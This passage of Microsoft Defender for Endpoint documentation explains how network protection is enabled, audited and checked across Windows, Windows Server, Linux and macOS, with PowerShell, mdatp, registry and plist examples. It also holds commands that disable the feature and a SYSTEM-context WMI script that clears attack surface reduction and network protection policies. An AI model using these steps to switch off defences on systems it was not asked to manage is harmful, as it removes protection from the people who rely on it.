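    Get-WinEvent -FilterXml $networkProtectionFilter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        Where-Object { -not $BlocksOnly -or $_.Id -eq 1126 } |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated = $_.TimeCreated
                Id          = $_.Id
                Meaning     = $meaning[[int]$_.Id]
                # The rendered message carries the URL/IP and the process. The property
                # layout of 1125/1126 is not documented on this page, so it is kept whole.
                Message     = $_.Message
            }
        }
}

# Audit vs. block counts, then the most recent entries in full
Get-NetworkProtectionEvents | Group-Object Meaning | Select-Object Name, Count
Get-NetworkProtectionEvents -MaxEvents 20 | Format-List TimeCreated, Meaning, Message
```

A spike of 5007 events next to a drop in 1126 events is worth a look on its own: it means the setting changed on the device, which in a Block-mode rollout is either your policy landing or someone turning the feature off locally.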

Network protection and the TCP three-way handshake
With network protection, the determination of whether to allow or block access to a site
is made after the completion of the three-way handshake via TCP/IP. Thus, when a site is
blocked by network protection, you might see an action type of ConnectionSuccess
under DeviceNetworkEvents in the Microsoft Defender portal, even though the site was
blocked. DeviceNetworkEvents are reported from the TCP layer, and not from network
protection. After the three-way handshake has completed, access to the site is allowed
or blocked by network protection.

Here's an example of how that works:

1. Suppose that a user attempts to access a website on their device. The site happens
to be hosted on a dangerous domain, and it should be blocked by network
protection.

2. The three-way handshake via TCP/IP commences. Before it completes, a
DeviceNetworkEvents action is logged, and its ActionType is listed as
ConnectionSuccess. However, as soon as the three-way handshake process completes,
network protection blocks access to the site. All of this happens quickly. A similar
process occurs with Microsoft Defender SmartScreen; it's when the three-way
handshake completes that a determination is made, and access to a site is either
blocked or allowed.

3. In the Microsoft Defender portal, an alert is listed in the alerts queue. Details of
that alert include both DeviceNetworkEvents and AlertEvidence. You can see that
the site was blocked, even though you also have a DeviceNetworkEvents item with
the ActionType of ConnectionSuccess .

Considerations for Windows virtual desktop running Windows 10 Enterprise Multi-Session
Due to the multi-user nature of Windows 10 Enterprise Multi-Session, keep the
following points in mind:

1. Network protection is a device-wide feature and can't be targeted to specific user
sessions.

2. Web content filtering policies are also device-wide.

3. If you need to differentiate between user groups, consider creating separate
Windows Virtual Desktop host pools and assignments.

4. Test network protection in audit mode to assess its behavior before rolling out.

5. Consider resizing your deployment if you have a large number of users or a large
number of multi-user sessions.

Alternative option for network protection


For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or
newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909
and up, used in Windows Virtual Desktop on Azure, network protection for Microsoft
Edge can be enabled using the following method:

1. Use Turn on network protection and follow the instructions to apply your policy.

2. Execute the following PowerShell commands:

Set-MpPreference -EnableNetworkProtection Enabled
Set-MpPreference -AllowNetworkProtectionOnWinServer 1
Set-MpPreference -AllowNetworkProtectionDownLevel 1
Set-MpPreference -AllowDatagramProcessingOnWinServer 1

7 Note

In some cases, depending on your infrastructure, volume of traffic, and other
conditions, Set-MpPreference -AllowDatagramProcessingOnWinServer 1 can have an
effect on network performance.

Network protection for Windows Servers


Following is information specific to Windows Servers.
Verify that network protection is enabled
Verify whether network protection is enabled on a local device by using Registry Editor.

1. Select the Start button in the task bar and type regedit to open the Registry Editor.

2. Select HKEY_LOCAL_MACHINE from the side menu.

3. Navigate through the nested menus to SOFTWARE > Policies > Microsoft >
Windows Defender > Windows Defender Exploit Guard > Network Protection.

(If the key is not present, navigate to SOFTWARE > Microsoft > Windows
Defender > Windows Defender Exploit Guard > Network Protection.)

4. Select EnableNetworkProtection to see the current state of network protection on
the device:

0 = Off
1 = On (enabled)
2 = Audit mode

For additional information, see: Turn on network protection

Network protection suggestion

For Windows Server 2012R2/2016 unified MDE client, Windows Server version 1803 or
newer, Windows Server 2019 or newer, and Windows 10 Enterprise Multi-Session 1909
and up (used in Windows Virtual Desktop on Azure), there are additional registry keys
that must be enabled:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection

AllowNetworkProtectionOnWinServer (dword) 1 (hex)
EnableNetworkProtection (dword) 1 (hex)
AllowNetworkProtectionDownLevel (dword) 1 (hex) - Windows Server 2012R2 and
Windows Server 2016 only

7 Note

Depending on your infrastructure, volume of traffic, and other conditions,
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\NIS\Consumers\IPS -
AllowDatagramProcessingOnWinServer (dword) 1 (hex) can have an effect on network
performance.

For additional information, see: Turn on network protection
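The "Verify that network protection is enabled" procedure above and the server registry keys in this section, carried out from PowerShell as an added example that is not part of the Microsoft documentation. It reads the policy key first and falls back to the local key, exactly as the procedure does, then cross-checks the result against Get-MpPreference, the real-time protection prerequisite, and, on Windows Server, the AllowNetworkProtection* switches. It assumes the installed Defender platform exposes those switches as Get-MpPreference properties; run it elevated on the device being checked.

```powershell
# Added example (not from the Defender for Endpoint documentation): report the
# effective network protection state on the local device. Policy key wins over the
# local key; Get-MpPreference reflects what the engine currently has; real-time
# protection must be active; servers also need AllowNetworkProtectionOnWinServer.
# Assumption: the platform exposes the Allow* switches on Get-MpPreference.

function Get-NetworkProtectionState {
    $policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection'
    $localKey  = 'HKLM:\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\Network Protection'
    $modes     = @{ 0 = 'Off'; 1 = 'On (Block)'; 2 = 'Audit' }

    # Same order as the manual procedure: a policy value takes precedence over the local one
    $regValue = $null; $regSource = 'Not configured'
    foreach ($key in @($policyKey, $localKey)) {
        $item = Get-ItemProperty -Path $key -Name EnableNetworkProtection -ErrorAction SilentlyContinue
        if ($null -ne $item) {
            $regValue  = [int]$item.EnableNetworkProtection
            $regSource = $key
            break
        }
    }

    $pref     = Get-MpPreference
    $status   = Get-MpComputerStatus
    $isServer = (Get-CimInstance Win32_OperatingSystem).ProductType -ne 1   # 1 = workstation
    $regMode  = if ($null -ne $regValue) { $modes[$regValue] } else { 'Not configured' }
    $prefMode = $modes[[int]$pref.EnableNetworkProtection]   # cast: the value is a byte, the keys are Int32

    $result = [ordered]@{
        RegistryMode       = $regMode
        RegistrySource     = $regSource
        MpPreferenceMode   = $prefMode
        RealTimeProtection = [bool]$status.RealTimeProtectionEnabled
        IsServer           = $isServer
    }

    if ($isServer) {
        # The server checklist from this section; DownLevel only matters on 2012 R2 / 2016
        $result.AllowNetworkProtectionOnWinServer  = [bool]$pref.AllowNetworkProtectionOnWinServer
        $result.AllowNetworkProtectionDownLevel    = [bool]$pref.AllowNetworkProtectionDownLevel
        $result.AllowDatagramProcessingOnWinServer = [bool]$pref.AllowDatagramProcessingOnWinServer
    }

    # Verdict: block or audit mode set, real-time protection on, and on servers the WinServer switch set
    $modeOn = $prefMode -in 'On (Block)', 'Audit'
    $result.Effective = $modeOn -and $result.RealTimeProtection -and
                        (-not $isServer -or $result.AllowNetworkProtectionOnWinServer)
    [pscustomobject]$result
}

Get-NetworkProtectionState | Format-List
```

When RegistryMode and MpPreferenceMode disagree, the policy has usually been written but the engine has not picked it up yet (or a competing management channel is setting it); when both say Audit but you expect blocks, remember from the section above that indicators and web content filtering are only enforced in Block mode.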

Windows Servers and Windows Multi-session configuration requires PowerShell

For Windows Servers and Windows Multi-session, there are additional items that you
must enable by using PowerShell cmdlets. This applies to the Windows Server 2012R2/2016
unified MDE client, Windows Server version 1803 or newer, Windows Server 2019 or newer,
and Windows 10 Enterprise Multi-Session 1909 and up, used in Windows Virtual Desktop on
Azure.

1. Set-MpPreference -EnableNetworkProtection Enabled
2. Set-MpPreference -AllowNetworkProtectionOnWinServer 1
3. Set-MpPreference -AllowNetworkProtectionDownLevel 1
4. Set-MpPreference -AllowDatagramProcessingOnWinServer 1

7 Note

In some cases, depending on your infrastructure, volume of traffic, and other
conditions, Set-MpPreference -AllowDatagramProcessingOnWinServer 1 can have
an effect on network performance.

Network protection troubleshooting


Due to the environment where network protection runs, the feature might not be able
to detect operating system proxy settings. In some cases, network protection clients are
unable to reach the cloud service. To resolve the connectivity problem, configure a static
proxy for Microsoft Defender Antivirus.

Optimizing network protection performance


Network protection now has a performance optimization that allows Block mode to start
asynchronously inspecting long-lived connections, which might provide a performance
improvement and can also help with app compatibility problems. This optimization
capability is on by default. You can turn off this capability by using the following
PowerShell cmdlet:

Set-MpPreference -AllowSwitchToAsyncInspection $false


See also
Evaluate network protection | Undertake a quick scenario that demonstrates how
the feature works, and what events would typically be created.
Enable network protection | Use Group Policy, PowerShell, or MDM CSPs to enable
and manage network protection in your network.
Configuring attack surface reduction capabilities in Microsoft Intune
Network protection for Linux | To learn about using Microsoft Network protection
for Linux devices.
Network protection for macOS | To learn more about Microsoft Network protection
for macOS

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Evaluate network protection
Article • 02/21/2024

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Network protection helps prevent employees from using any application to access
dangerous domains that might host phishing scams, exploits, and other malicious
content on the Internet.

This article helps you evaluate network protection by enabling the feature and guiding
you to a testing site. The sites in this evaluation article aren't malicious. They're specially
created websites that pretend to be malicious. The site replicates the behavior that
would happen if a user visited a malicious site or domain.

Enable network protection in audit mode


Enable network protection in audit mode to see which IP addresses and domains might
be blocked. You can make sure it doesn't affect line-of-business apps, or get an idea of
how often blocks occur.

1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator

2. Enter the following cmdlet:

PowerShell

Set-MpPreference -EnableNetworkProtection AuditMode

Visit a (fake) malicious domain


1. Open Internet Explorer, Google Chrome, or any other browser of your choice.

2. Go to https://smartscreentestratings2.net .

The network connection is allowed and a test message displays.


7 Note

Network connections can be successful even though a site is blocked by network
protection. To learn more, see Network protection and the TCP three-way
handshake.

Review network protection events in Windows Event Viewer
To review apps that would have been blocked, open Event Viewer and filter for Event ID
1125 in the Microsoft-Windows-Windows Defender/Operational log. The following table
lists all network protection events.

Event ID | Provider/Source | Description
5007 | Windows Defender (Operational) | Event when settings are changed
1125 | Windows Defender (Operational) | Event when a network connection is audited
1126 | Windows Defender (Operational) | Event when a network connection is blocked

See also
Network protection

Network protection and the TCP three-way handshake


Enable network protection

Troubleshoot network protection

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Turn on network protection
Article • 02/22/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR
Microsoft Defender Antivirus

Platforms

Windows
Linux (See Network protection for Linux)
macOS (See Network protection for macOS)

 Tip

Want to experience Defender for Endpoint? Sign up for a free trial.

Network protection helps to prevent employees from using any application to access
dangerous domains that may host phishing scams, exploits, and other malicious content
on the internet. You can audit network protection in a test environment to view which
apps would be blocked before enabling network protection.

Learn more about network filtering configuration options.

Check if network protection is enabled


Check if network protection has been enabled on a local device by using Registry editor.

1. Select the Start button in the task bar and type regedit to open Registry editor.

2. Choose HKEY_LOCAL_MACHINE from the side menu.

3. Navigate through the nested menus to SOFTWARE > Policies > Microsoft >
Windows Defender > Policy Manager.

If the Key is missing, Navigate to SOFTWARE > Microsoft > Windows Defender >
Windows Defender Exploit Guard > Network Protection.
4. Select EnableNetworkProtection to see the current state of network protection on
the device:

0, or Off
1, or On
2, or Audit mode

Enable network protection


Enable network protection by using any of these methods:

PowerShell
Mobile Device Management (MDM)
Microsoft Intune
Group Policy
Microsoft Configuration Manager

PowerShell
1. Type powershell in the Start menu, right-click Windows PowerShell and select Run
as administrator.

2. Enter the following cmdlet:

PowerShell

Set-MpPreference -EnableNetworkProtection Enabled

3. Optional: Enable the feature in audit mode using the following cmdlet:

PowerShell

Set-MpPreference -EnableNetworkProtection AuditMode

Use Disabled instead of AuditMode or Enabled to turn off the feature.

Mobile device management (MDM)


Use the ./Vendor/MSFT/Policy/Config/Defender/EnableNetworkProtection configuration
service provider (CSP) to enable or disable network protection or enable audit mode.

Update Microsoft Defender antimalware platform to the latest version before you
enable or disable network protection or enable audit mode.

Microsoft Intune

Microsoft Defender for Endpoint Baseline method

1. Sign into the Microsoft Intune admin center (https://endpoint.microsoft.com ).


2. Go to Endpoint security > Security baselines > Microsoft Defender for Endpoint
Baseline.
3. Select Create a profile, then provide a name for your profile, and then select Next.
4. In the Configuration settings section, go to Attack Surface Reduction Rules > set
Block, Enable or Audit for Enable network protection. Select Next.
5. Select the appropriate Scope tags and Assignments as required by your
organization.
6. Review all the information, and then select Create.

Antivirus policy method


1. Sign into the Microsoft Intune admin center (https://endpoint.microsoft.com ).
2. Go to Endpoint security > Antivirus
3. Select Create a policy
4. In the Create a policy flyout, choose Windows 10, Windows 11, and Windows
Server from the Platform list.
5. Choose Microsoft Defender Antivirus from the Profile list then choose Create
6. Provide a name for your profile, and then select Next.
7. In the Configuration settings section, select Disabled, Enabled (block mode) or
Enabled (audit mode) for Enable Network Protection, then select Next.
8. Select the appropriate Assignments and Scope tags as required by your
organization.
9. Review all the information, and then select Create.

Configuration profile method


1. Sign into the Microsoft Intune admin center (https://endpoint.microsoft.com ).

2. Go to Devices > Configuration profiles > Create profile.

3. In the Create a profile flyout, select Platform and choose the Profile Type as
Templates.

4. In the Template name, Choose Endpoint protection from the list of templates, and
then select Create.

5. Go to Endpoint protection > Basics, provide a name for your profile, and then
select Next.

6. In the Configuration settings section, go to Microsoft Defender Exploit Guard >
Network filtering > Network protection > Enable or Audit. Select Next.

7. Select the appropriate Scope tags, Assignments, and Applicability rules as
required by your organization. Admins can set more requirements.

8. Review all the information, and then select Create.


Group Policy
Use the following procedure to enable network protection on domain-joined computers
or on a standalone computer.

1. On a standalone computer, go to Start and then type and select Edit group policy.

-Or-

On a domain-joined Group Policy management computer, open the Group Policy
Management Console, right-click the Group Policy Object you want to configure
and select Edit.

2. In the Group Policy Management Editor, go to Computer configuration and
select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus >
Microsoft Defender Exploit Guard > Network protection.

7 Note

On older versions of Windows, the group policy path may say "Windows
Defender Antivirus" instead of "Microsoft Defender Antivirus."

4. Double-click the Prevent users and apps from accessing dangerous websites
setting and set the option to Enabled. In the options section, you must specify one
of the following options:

Block - Users can't access malicious IP addresses and domains.
Disable (Default) - The Network protection feature won't work. Users won't
be blocked from accessing malicious domains.
Audit Mode - If a user visits a malicious IP address or domain, an event will
be recorded in the Windows event log. However, the user won't be blocked
from visiting the address.

) Important

To fully enable network protection, you must set the Group Policy option to
Enabled and also select Block in the options drop-down menu.

7 Note
Optional: Follow the steps in Check if network protection is enabled to verify
that your Group Policy settings are correct.

Microsoft Configuration Manager


1. Open the Configuration Manager console.

2. Go to Assets and Compliance > Endpoint Protection > Windows Defender
Exploit Guard.

3. Select Create Exploit Guard Policy from the ribbon to create a new policy.

To edit an existing policy, select the policy, then select Properties from either
the ribbon or the right-click menu. Edit the Configure network protection
option from the Network Protection tab.

4. On the General page, specify a name for the new policy and verify the Network
protection option is enabled.

5. On the Network protection page, select one of the following settings for the
Configure network protection option:

Block
Audit
Disabled

6. Complete the rest of the steps, and save the policy.

7. From the ribbon, select Deploy to deploy the policy to a collection.

) Important

Once you deploy an Exploit Guard policy from Configuration Manager, the Exploit
Guard settings will not be removed from the clients if you remove the deployment.
Delete not supported is recorded in the Configuration Manager client's
ExploitGuardHandler.log if you remove the client's Exploit Guard deployment. The
following PowerShell script can be run under SYSTEM context to remove these
settings:

PowerShell

# Clear the Defender policy node (ASR rules, controlled folder access, network
# protection) that the Configuration Manager Exploit Guard policy wrote through the MDM bridge
$defenderObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -Class "MDM_Policy_Config01_Defender02" -Filter "InstanceID='Defender' and ParentID='./Vendor/MSFT/Policy/Config'"
$defenderObject.AttackSurfaceReductionRules = $null
$defenderObject.AttackSurfaceReductionOnlyExclusions = $null
$defenderObject.EnableControlledFolderAccess = $null
$defenderObject.ControlledFolderAccessAllowedApplications = $null
$defenderObject.ControlledFolderAccessProtectedFolders = $null
$defenderObject.EnableNetworkProtection = $null
$defenderObject.Put()

# Clear the exploit protection settings node the same way
$exploitGuardObject = Get-WmiObject -Namespace "root/cimv2/mdm/dmmap" -Class "MDM_Policy_Config01_ExploitGuard02" -Filter "InstanceID='ExploitGuard' and ParentID='./Vendor/MSFT/Policy/Config'"
$exploitGuardObject.ExploitProtectionSettings = $null
$exploitGuardObject.Put()

See also
Network protection

Network protection for Linux

Network protection for macOS

Network protection and the TCP three-way handshake

Evaluate network protection

Troubleshoot network protection

 Tip

Do you want to learn more? Engage with the Microsoft Security community in our
Tech Community: Microsoft Defender for Endpoint Tech Community .



Network protection for Linux
Article • 11/15/2023

Applies to:

Microsoft Defender for Endpoint Plan 1


Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

) Important

Some information relates to prereleased product which may be substantially
modified before it's commercially released. Microsoft makes no warranties, express
or implied, with respect to the information provided here.

Overview
Microsoft is bringing Network Protection functionality to Linux.

Network protection helps reduce the attack surface of your devices from Internet-based
events. It prevents employees from using any application to access dangerous domains
that may host:

phishing scams
exploits
other malicious content on the Internet

Network protection expands the scope of Microsoft Defender SmartScreen to block all
outbound HTTP(S) traffic that attempts to connect to low-reputation sources. The blocks
on outbound HTTP(S) traffic are based on the domain or hostname.

Web content filtering for Linux


You can use web content filtering for testing with Network protection for Linux. See Web
content filtering.

Known issues
Network Protection is implemented as a virtual private network (VPN) tunnel.
Advanced packet routing options using custom nftables/iptables scripts are
available.
Block/Warn UX isn't available
Customer feedback is being collected to drive further design improvements

7 Note

To evaluate the effectiveness of Linux Web Threat Protection, we recommend using
the Firefox browser, which is the default for all the distributions.

Prerequisites
Licensing: Microsoft Defender for Endpoint tenant (can be trial) and platform
specific requirements found in Microsoft Defender for Endpoint for non-Windows
platforms
Onboarded Machines:
Minimum Linux version: For a list of supported distributions, see Microsoft
Defender for Endpoint on Linux.
Microsoft Defender for Endpoint Linux client version: 101.78.13 -
insiderSlow(Preview)

Instructions
To deploy Defender for Endpoint on Linux manually, see Deploy Microsoft Defender for
Endpoint on Linux manually.

The following example shows the sequence of commands needed to install the mdatp
package on Ubuntu 20.04 from the insiders-slow channel.

Bash

# Register the insiders-slow repository for Ubuntu 20.04
curl -o microsoft.list https://packages.microsoft.com/config/ubuntu/20.04/insiders-slow.list
sudo mv ./microsoft.list /etc/apt/sources.list.d/microsoft-insiders-slow.list
# Import the Microsoft package signing key (apt-key is deprecated on newer
# releases, but still works on Ubuntu 20.04)
sudo apt-get install gpg
curl https://packages.microsoft.com/keys/microsoft.asc | sudo apt-key add -
# Let apt fetch over HTTPS, refresh the package index, and install the agent
sudo apt-get install apt-transport-https
sudo apt-get update
sudo apt install -y mdatp

Device Onboarding
To onboard the device, you must download the Python onboarding package for Linux
server from Microsoft Defender XDR -> Settings -> Device Management -> Onboarding
and run:

Bash

sudo python3 MicrosoftDefenderATPOnboardingLinuxServer.py

Validation
1. Check that Network Protection blocks the always-blocked test sites:

http://smartscreentestratings2.net
https://smartscreentestratings2.net

2. Inspect the diagnostic logs:

Bash

sudo mdatp log level set --level debug
sudo tail -f /var/log/microsoft/mdatp/microsoft_defender_np_ext.log

To exit validation mode, disable network protection and restart the network
connection:

Bash

sudo mdatp config network-protection enforcement-level --value disabled

Advanced configuration
By default, Linux network protection is active on the default gateway; routing and
tunneling are internally configured. To customize the network interfaces, change the
networkSetupMode parameter in the /opt/microsoft/mdatp/conf/ configuration file
and restart the service:

Bash

sudo systemctl restart mdatp

The configuration file also enables you to customize:

proxy settings
SSL certificate stores
tunneling device name
IP
and more

The default values were tested for all distributions as described in Microsoft Defender
for Endpoint on Linux.

Microsoft Defender portal

Also, make sure that in Microsoft Defender > Settings > Endpoints > Advanced
features the 'Custom network indicators' toggle is enabled.

) Important

The 'Custom network indicators' toggle controls custom indicator enforcement for
ALL platforms with Network Protection support, including Windows. Note that on
Windows, for indicators to be enforced, you must also have Network Protection
explicitly enabled.

How to explore the features

1. Learn how to Protect your organization against web threats using web threat
protection.

Web threat protection is part of web protection in Microsoft Defender for
Endpoint. It uses network protection to secure your devices against web
threats.

2. Run through the Custom Indicators of Compromise flow to get blocks on the
Custom Indicator type.

3. Explore Web content filtering.

7 Note

If you are removing a policy or changing device groups at the same time, this
might cause a delay in policy deployment. Pro tip: You can deploy a policy
without selecting any category on a device group. This action creates an
audit-only policy, to help you understand user behavior before creating a
block policy.

Device group creation is supported in Defender for Endpoint Plan 1 and Plan
2.

4. Integrate Microsoft Defender for Endpoint with Defender for Cloud Apps, and your
network protection-enabled Linux devices will have endpoint policy enforcement
capabilities.

7 Note

Discovery and other features are currently not supported on these platforms.

Scenarios
The following scenarios are supported during public preview:

Web threat protection

Web threat protection is part of Web protection in Microsoft Defender for Endpoint. It
uses network protection to secure your devices against web threats. By integrating with
Microsoft Edge and popular third-party browsers like Chrome and Firefox, web threat
protection stops web threats without a web proxy. Web threat protection can protect
devices while they're on premises or away. Web threat protection stops access to the
following types of sites:

phishing sites
malware vectors
exploit sites
untrusted or low-reputation sites
sites you've blocked in your custom indicator list

For more information, see Protect your organization against web threat

Custom Indicators of Compromise

Indicator of compromise (IoCs) matching is an essential feature in every endpoint
protection solution. This capability gives SecOps the ability to set a list of indicators for
detection and for blocking (prevention and response).

Create indicators that define the detection, prevention, and exclusion of entities. You can
define the action to be taken as well as the duration for when to apply the action and
the scope of the device group to apply it to.

Currently supported sources are the cloud detection engine of Defender for Endpoint,
the automated investigation and remediation engine, and the endpoint prevention
engine (Microsoft Defender Antivirus).

For more information, see: Create indicators for IPs and URLs/domains.

Web content filtering

Web content filtering is part of the Web protection capabilities in Microsoft Defender for
Endpoint and Microsoft Defender for Business. Web content filtering enables your
organization to track and regulate access to websites based on their content categories.
Many of these websites (even if they're not malicious) might be problematic because of
compliance regulations, bandwidth usage, or other concerns.

Configure policies across your device groups to block certain categories. Blocking a
category prevents users within specified device groups from accessing URLs associated
with the category. For any category that's not blocked, the URLs are automatically
audited. Your users can access the URLs without disruption, and you'll gather access
statistics to help create a more custom policy decision. Your users will see a block
notification if an element on the page they're viewing is making calls to a blocked
resource.

Web content filtering is available on the major web browsers, with blocks performed by
Windows Defender SmartScreen (Microsoft Edge) and Network Protection (Chrome,
Firefox, Brave, and Opera). For more information about browser support, see
Prerequisites.

For more information about reporting, see Web content filtering.

Microsoft Defender for Cloud Apps

The Microsoft Defender for Cloud Apps Cloud App Catalog identifies apps that you want
end users to be warned about when accessing them through Microsoft Defender for
Endpoint; mark those apps as Monitored. The domains listed under monitored apps are
later synced to Microsoft Defender for Endpoint:

Within 10-15 minutes, these domains are listed in Microsoft Defender XDR under
Indicators > URLs/Domains with Action=Warn. Within the enforcement SLA, end users
are warned when they attempt to access these domains.

See also
Protect your network
Turn on network protection
Web protection
Create indicators
Web content filtering
Microsoft Defender for Endpoint on Linux


Network protection for macOS
Article • 02/22/2024

Applies to:

Microsoft Defender for Endpoint Plan 1
Microsoft Defender for Endpoint Plan 2
Microsoft Defender XDR

Overview
Network protection helps reduce the attack surface of your devices from
Internet-based events. It prevents employees from using any application to access
dangerous domains that might host:

phishing scams
exploits
other malicious content on the Internet

Network protection expands the scope of Microsoft Defender SmartScreen to block
all outbound HTTP(S) traffic that attempts to connect to low-reputation sources. The
blocks on outbound HTTP(S) traffic are based on the domain or hostname.

Availability
Network Protection for macOS is now available for all Microsoft Defender for Endpoint
onboarded macOS devices that meet the minimum requirements. All of your currently
configured Network Protection and Web Threat Protection policies are enforced on
macOS devices where Network Protection is configured for block mode.

To roll out Network Protection for macOS, we recommend the following actions:

Create a device group for a small set of devices that you can use to test Network
Protection.
Evaluate the impact of Web Threat Protection, Custom Indicators of Compromise,
Web Content Filtering, and Microsoft Defender for Cloud Apps enforcement
policies that target those macOS devices where Network Protection is in Block
mode.
Deploy an audit or block mode policy to this device group and verify there are no
issues or broken workstreams.
Gradually deploy Network Protection to a larger set of devices until it's fully rolled
out.

Current capabilities
Custom Indicators of Compromise on Domains and IPs.
Web Content Filtering support:
Block website categories scoped to device groups through policies created in
the Microsoft Defender portal.
Policies are applied to browsers, including Chromium Microsoft Edge for
macOS.
Advanced Hunting - Network Events are reflected in the Machine Timeline, and
queryable in Advanced Hunting to aid security investigations.
Microsoft Defender for Cloud Apps:
Shadow IT discovery - Identify which apps are being used in your organization.
Block applications - Block entire applications (such as Slack and Facebook) from
being used in your organization.
Corporate VPN in tandem or side-by-side with Network Protection:
Currently, no VPN conflicts are identified.
If you do experience conflicts, you can provide feedback through the feedback
channel listed at the bottom of this page.

Known issues
Block/Warn UX isn't customizable and might require other look and feel changes.
(Customer feedback is being collected to drive further design improvements)
There's a known application incompatibility issue with VMware's "Per-App Tunnel"
feature. (This incompatibility might result in an inability to block traffic that goes
through the "Per-App Tunnel.")
There's a known application incompatibility issue with Blue Coat Proxy. (This
incompatibility might result in network layer crashes in unrelated applications
when both Blue Coat Proxy and Network Protection are enabled.)

Important notes
We don't recommend controlling network protection from System Preferences by
using the Disconnect button. Instead, use the mdatp command-line tool or JAMF /
Intune to control network protection for macOS.
To evaluate the effectiveness of macOS web threat protection, we recommend trying it
in browsers other than Microsoft Edge for macOS (for example, Safari). Microsoft
Edge for macOS has built-in web threat protection that is enabled regardless of
whether the Mac network protection feature you're evaluating is turned on or not.

7 Note

Microsoft Edge for macOS does not currently support web content filtering, custom
indicators, or other enterprise features. However, network protection will provide
this protection to Microsoft Edge for macOS if network protection is enabled.

Prerequisites
Licensing: Microsoft Defender for Endpoint Plan 1 or Microsoft Defender for
Endpoint Plan 2 (can be trial)
Onboarded Machines:
Minimum macOS version: 11
Product version 101.94.13 or later

Deployment instructions

Microsoft Defender for Endpoint

Install the most recent product version through Microsoft AutoUpdate. To open
Microsoft AutoUpdate, run the following command from the Terminal:

Bash

open /Library/Application\ Support/Microsoft/MAU2.0/Microsoft\ AutoUpdate.app

Configure the product with your organization information using the instructions in our
public documentation.

Network protection is disabled by default, but it can be configured to run in one of the
following modes (also called enforcement levels):

Audit: useful to make sure it doesn't affect line-of-business apps, or get an idea of
how often blocks occur
Block: network protection prevents connection to malicious websites
Disabled: all components associated with network protection are disabled

You can deploy this feature in one of the following ways: manually, through JAMF, or
through Intune. The following sections describe each of these methods in detail.

Manual deployment
To configure the enforcement level, run the following command from the Terminal:

Bash

mdatp config network-protection enforcement-level --value [enforcement-level]

For example, to configure network protection to run in blocking mode, execute the
following command:

Bash

mdatp config network-protection enforcement-level --value block

To confirm that network protection has been started successfully, run the following
command from the Terminal, and verify that it prints "started":

Bash

mdatp health --field network_protection_status

JAMF deployment

A successful JAMF deployment requires a configuration profile to set the enforcement
level of network protection. After you create this configuration profile, assign it to the
devices where you want to enable network protection.

Configure the enforcement level

Note: If you've already configured Microsoft Defender for Endpoint on Mac using
the instructions listed here, then update the plist file you previously deployed with the
content listed below and redeploy it from JAMF.

1. In Computers > Configuration Profiles, select Options > Applications & Custom
Settings
2. Select Upload File (PLIST file)
3. Set preference domain to com.microsoft.wdav
4. Upload the following plist file

XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>networkProtection</key>
<dict>
<key>enforcementLevel</key>
<string>block</string>
</dict>
</dict>
</plist>

Intune deployment
A successful Intune deployment requires a configuration profile to set the enforcement
level of network protection. After you create this configuration profile, assign it to the
devices where you want to enable network protection.

Configure the enforcement level using Intune

7 Note

If you've already configured Microsoft Defender for Endpoint on Mac using the
previous instructions (with an XML file), then remove the previous Custom
configuration policy and replace it with the instructions below.

1. Open Manage > Device configuration. Select Manage > Profiles > Create Profile.
2. Change Platform to macOS and Profile type to Settings catalog. Select Create.
3. Specify a name for the profile.
4. On the Configuration settings screen, select Add settings. Select Microsoft
Defender > Network protection, and tick the Enforcement level checkbox.
5. Set the enforcement level to block. Select Next
6. Open the configuration profile and upload the com.microsoft.wdav.xml file. (This
file was created in step 3.)
7. Select OK
8. Select Manage > Assignments. In the Include tab, select the devices for which you
want to enable network protection.

Mobileconfig deployment
To deploy the configuration via a .mobileconfig file, which can be used with non-
Microsoft MDM solutions or distributed to devices directly:

1. Save the following payload as com.microsoft.wdav.xml.mobileconfig

XML

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1">
<dict>
<key>PayloadUUID</key>
<string>C4E6A782-0C8D-44AB-A025-EB893987A295</string>
<key>PayloadType</key>
<string>Configuration</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender ATP settings</string>
<key>PayloadDescription</key>
<string>Microsoft Defender ATP configuration settings</string>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>PayloadRemovalDisallowed</key>
<true/>
<key>PayloadScope</key>
<string>System</string>
<key>PayloadContent</key>
<array>
<dict>
<key>PayloadUUID</key>
<string>99DBC2BC-3B3A-46A2-A413-C8F9BB9A7295</string>
<key>PayloadType</key>
<string>com.microsoft.wdav</string>
<key>PayloadOrganization</key>
<string>Microsoft</string>
<key>PayloadIdentifier</key>
<string>com.microsoft.wdav</string>
<key>PayloadDisplayName</key>
<string>Microsoft Defender ATP configuration settings</string>
<key>PayloadDescription</key>
<string/>
<key>PayloadVersion</key>
<integer>1</integer>
<key>PayloadEnabled</key>
<true/>
<key>networkProtection</key>
<dict>
